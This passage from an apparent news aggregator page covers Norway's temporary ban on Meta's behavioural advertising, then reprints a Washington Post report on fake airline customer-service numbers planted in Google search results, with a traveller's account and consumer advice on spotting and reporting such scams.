However, despite making some changes to comply with the Irish DPC's December ruling, the Court of Justice of the European Union (CJEU) found that Meta's GDPR approach to behavioral advertising is still largely illegal.

"Since then, Meta has made certain changes, but a fresh decision from the Court of Justice of the European Union (curia.europa.eu) has stated that Meta's behavioural advertising still does not comply with the law," the Norwegian watchdog said.

"Therefore, the Norwegian Data Protection Authority is now taking action by imposing a temporary ban."

Meta's non-compliance aligns with the company's statement after being fined in December. The company rejected DPC's findings and said it would appeal the fines, blaming the decision on a "lack of regulatory clarity."

"Facebook and Instagram are inherently personalised, and we believe that providing each user with their own unique experience – including the ads they see – is a necessary and essential part of that service," Meta said.

In November, Meta was hit with another €265 million ($275.5 million) fine by the Irish data watchdog for failing to protect Facebook users' data from scrapers after data linked to 533 million Facebook accounts leaked on a hacker forum.

Source

After sitting on the runway for an extended wait, Shmuli Evers’s plane returned to the terminal at John F. Kennedy Airport. The weather earlier this week was too dangerous to fly, so his 7 a.m. flight to Florida would not be taking off. Immediately, the line for Delta’s in-house customer service began to stretch through the airport, filled with passengers from his flight. Evers figured he could avoid the wait by calling Delta’s customer service hotline, so he turned to Google.

He dialed the first phone number the search engine listed. The automated voice at the number Evers called claimed to be a central customer service desk for multiple airlines, although Delta’s name was never explicitly mentioned. That was the first sign something wasn’t right.

Evers had accidentally called a number added to Google by potential scammers in place of the actual Delta customer service number. Like other consumers in recent years, he didn’t know that search results can be manipulated by scammers. It’s called “malvertising.”

After many redirections to international numbers, he began speaking with a friendly voice who said he was a Delta representative. The “representative” asked Evers for his name and flight itinerary and said they had canceled his existing flight manually. He then directed Evers to a flight at Newark Liberty Airport, which he could book for five times the original price of his ticket.

To confirm the ticket, he texted Evers from a different number than he had called from. Evers became suspicious and asked where the representative was located. When the representative responded that he was two hours south of Manhattan in Rochester — which is actually north of the city, on the shore of Lake Ontario — Evers suspected this was a scam and hung up. The supposed help desk employee was persistent, continuing to send text messages about how hard he had worked to find this flight and how all Evers needed to do was provide his payment information to get to Florida on time.

“I just ignored it from there. Go away,” Evers said. “That’s when … I looked up the number and I realized that Delta was not the only one that had their listing created, most likely, by scammers.”

Evers posted several tweets Sunday morning to relay his experience, and in creating a now-viral thread, published screenshots of Google results that appear to show incorrect phone numbers for several other airlines; Evers found that Southwest Airlines, American Airlines, Air France and more had been affected.

“We do not tolerate this misleading activity, and are constantly monitoring and evolving our platforms to combat fraud and create a safe environment for users and businesses,” Google said in a statement emailed to The Washington Post. “Our teams have already begun reverting the inaccuracies, suspending the malicious accounts involved, and applying additional protections to prevent further abuse.”

In a Tuesday search The Post conducted, these numbers had all been replaced with their accurate counterparts listed on the airlines’ websites. However, while searching for “Delta Air Lines” using the Safari app, The Post found two potentially fraudulent websites with sponsored ads on Google that appeared above the official Delta website in search results.

Scams in which criminals alter the contact information of major companies are relatively common and have targeted a number of travel-based industries in recent years, including rental car companies and airlines, said Amy Nofziger, the director of fraud victim support at AARP.

Since Sunday, Evers said, other Twitter users have reached out to share stories of similar incidents. “There’s people that said, ‘This scam cost me hundreds of dollars and thousands of dollars,’” he said.

Here are the best ways to identify this type of scam and prevent it from happening to you.

How do scammers alter Google search results?

Google users can contribute information to search results, which can lead to scammers replacing official business phone numbers with false ones.

They may do this by contributing information to a business’s page by acting as that business online. Until someone realizes that the phone number is incorrect, the false number will remain on the Google business page.

Nofziger says potential scammers can place false contact information in other ways, too; they may impersonate an official company account on social media or reply to posts on internet complaint boards with this information.

Search results for airline customer service numbers has been a point of contention between search engine companies and scammers for years. In 2021, ads at the top of Google search results for queries like “United customer service” would surface ads from fake sites, essentially paying Google to defraud its users. The fake ads would appear higher than the “infobox” with the airline’s real phone number and sometimes linked to sites hosted by Google, adding to their credibility.

What red flags suggest I’m being scammed?

If you are unsure whether a company’s phone number is correct, visit their official website to confirm.

Official websites often have the most reliable information on how to contact the airline, including through live chat, phone and email. These sites tend to have a “.com” ending for U.S.-based businesses. Nofziger recommends avoiding a potential scam by repeatedly verifying the phone number listed on the official website.

Red flags may also appear in the price point and payment method. Prices should not be significantly higher than what you originally paid — in Evers’ case, five times the original price. You should also be wary if an individual asks you to pay via prepaid gift card, wire transfer, Venmo or cryptocurrency.

“In a lot of our situations we hear from victims who say they were offered a good deal if they paid via a certain way,” Nofziger said. “The majority of the time, the criminals were asking to be paid by prepaid gift card. The reason they’re asking for those forms of payment is because they are quick and easily accessible to consumers, and they’re quick and easy and accessible to criminals to download the money off of that card and steal it from you.”

Although these situations can be stressful, Nofziger advises to take a deep breath and “trust your gut” before contacting customer service. Scams like this exploit the sense of urgency travelers feel when their flight is canceled. If a salesperson or representative is pressuring you to act quickly, it may be indicative of a scam.

Who should I call if I get scammed?

Nofziger emphasized the importance of reporting a scam if you encounter one. Airlines may open investigations into these cases, and Google can edit the information on its business pages and suspend bad actors’ accounts.

“Whenever we become aware of an alleged scam targeting our customers, including in this situation, we immediately conduct an investigation. Using the facts gained from an investigation, when able, we can then address each unique situation as appropriate with the necessary legal means at our disposal,” said Drake Castañeda, a corporate communications official at Delta.

If you live in the United States, you can report scams and fraud to the Federal Trade Commission here or contact the FBI’s Internet Crime Complaint Center here. You may also contact the AARP Fraud Watch Network Helpline, which is available to people of all ages regardless of AARP membership, at 877-908-3360. Posting about it online as Evers did is also a useful method to warn other consumers.

“It does sometimes take one person to have this experience happen to them for other people to realize that might happen to them as well,” said Nofziger. “Anywhere that you can report it and share the information to help other people not be a victim and to educate is fantastic. If you have a voice, use it.”

Southwest Airlines, American Airlines, ITA Airways, Qantas Airways and Turkish Airlines did not respond to The Post’s requests for comment. Air France confirmed its correct U.S. phone number is 800-237-2747 but declined to comment further.

Jeremy Merrill contributed to this report.

Source